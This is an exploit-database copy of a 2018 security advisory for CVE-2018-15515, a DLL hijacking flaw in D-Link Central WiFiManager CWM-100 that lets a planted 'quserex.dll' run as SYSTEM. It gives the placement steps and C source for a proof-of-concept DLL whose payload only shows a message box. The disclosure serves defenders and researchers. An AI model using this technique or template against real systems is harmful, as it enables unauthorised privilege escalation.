D-LINK Central WifiManager (CWM 100) 1.03 r0098 DLL Hijacking Exploit

2018-11-09T00:00:00
ID 1337DAY-ID-31560
Type zdt
Reporter hyp3rlinx
Modified 2018-11-09T00:00:00

Description

D-Link Central WiFiManager CWM-100 version 1.03 r0098 devices will load a trojan horse "quserex.dll" and will create a new thread running with SYSTEM integrity.

                                        
                                            [+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SYSTEM-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec          
 

***Greetz: indoushka | Eduardo B.***



[Vendor]
us.dlink.com


[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Links free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks.


[Vulnerability Type]
Trojan File SYSTEM Privilege Escalation


[Affected Component]
"quserex.dll"


[CVE Reference]
CVE-2018-15515


[Security Issue]
D-Link Central WiFiManager CWM-100 1.03 r0098 devices will load a Trojan horse "quserex.dll" and will create a new thread running with SYSTEM integrity.


[Impact]
Code Execution as SYSTEM


[Exploit/POC]
1) Create 32bit DLL named "quserex.dll" and place in "CaptivelPortal.exe" directory under the DLINK directory

2) Restart the service "CaptivelPortal"

3) Proof, examine using process monitor (sysinternals)


#include <windows.h>

/* hyp3rlinx */

/*
gcc -c -m32 quserex.c
gcc -shared -m32 -o quserex.dll quserex.o
*/

void executo(){
  MessageBox(NULL, "Enjoy ur SYSTEM Integrity!", ":)", MB_OK);
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
 switch(fdwReason){
  case DLL_PROCESS_ATTACH:{
  executo();
  break;
  }
  case DLL_PROCESS_DETACH:{
  executo();
  break;
  }
  case DLL_THREAD_ATTACH:{
  executo();
  break;
       }
  case DLL_THREAD_DETACH:{
  executo();
  break;
  }
   }
  return TRUE;
}

#  0day.today [2018-11-12]  #